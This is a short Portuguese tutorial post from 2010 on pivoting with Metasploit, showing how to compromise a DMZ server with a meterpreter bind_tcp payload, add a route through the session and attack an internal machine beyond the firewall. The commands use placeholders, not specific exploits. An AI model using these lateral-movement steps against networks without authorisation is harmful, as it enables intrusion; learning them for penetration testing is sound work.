Metasploit: atacando um objetivo final a partir de uma máquina já comprometida

Publicado por Luiz Vieira em 04/02/2010

[ Hits: 9.176 ]

Blog: http://hackproofing.blogspot.com/

 


Metasploit: atacando um objetivo final a partir de uma máquina já comprometida



Algumas vezes, ao realizar um ataque, é necessário tornar vulneráveis várias máquinas até chegarmos ao nosso objetivo final. E uma das questões mais comuns nestas situações é: como é possível atacar uma máquina a partir de outra a qual já tenho acesso?

Vejamos um exemplo:
Linux: Metasploit: atacando um objetivo final a partir de uma máquina já comprometida
Como podemos ver na imagem acima, um atacante pode ganhar acesso a algum servidor que se encontra na DMZ (zona desmilitarizada) e a partir dali atacar outras máquinas que se encontrem além do firewall. Para isso é possível utilizar o framework Metasploit, o qual será muito útil.

O primeiro passo obviamente é encontrar uma vulnerabilidade no servidor que se encontra na DMZ e explorá-la usando como payload o meterpreter. No terminal do Metasploit digitamos:

use [exploit que ataca a vulnerabilidade encontrada]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [ip_host_dmz]
exploit-que-ataca-a-vulnerabilidade-encontrada


Agora precisamos saber o ID da sessão, para isso digitamos o seguinte no terminal do meterpreter:

sessions -l

O seguinte passo é criar uma rota até a máquina que é nosso objetivo final, indicando seu IP, a máscara e o ID de sessão que obtivemos no passo anterior:

route add [ip_maquina_objetivo] [Máscara de rede] [ID-Sessão]

Por último, realizamos o ataque à máquina objetivo, de forma normal, como se faria em qualquer outro caso, quer dizer, buscando a vulnerabilidade e aplicando o respectivo exploit. A diferença é que devemos dizer ao Metasploit que deve passar pelo PC que já temos acesso:

use [exploit_necessário]
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST [máquina_objetivo]
exploit


Desta forma podemos realizar um "bypass" usando o Metasploit, algo muito útil para todos os interessados na área de segurança da informação.

Outras dicas deste autor

Como detectar e prevenir escalada de privilégios no GNU/Linux

Ebook - Advanced Linux Programming

Gerador de backdoor indetectável

Palestra How Stuff Works: Exploits

Norton inaugura serviço público de DNS

Leitura recomendada

Replicação de servidor com partimage

O que é Software Livre

Impressão no SIAFI com Ubuntu

PACMAN do Arch Linux

Acertando os ponteiros do seu Linux

  

Comentários

Nenhum comentário foi encontrado.



Contribuir com comentário




Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts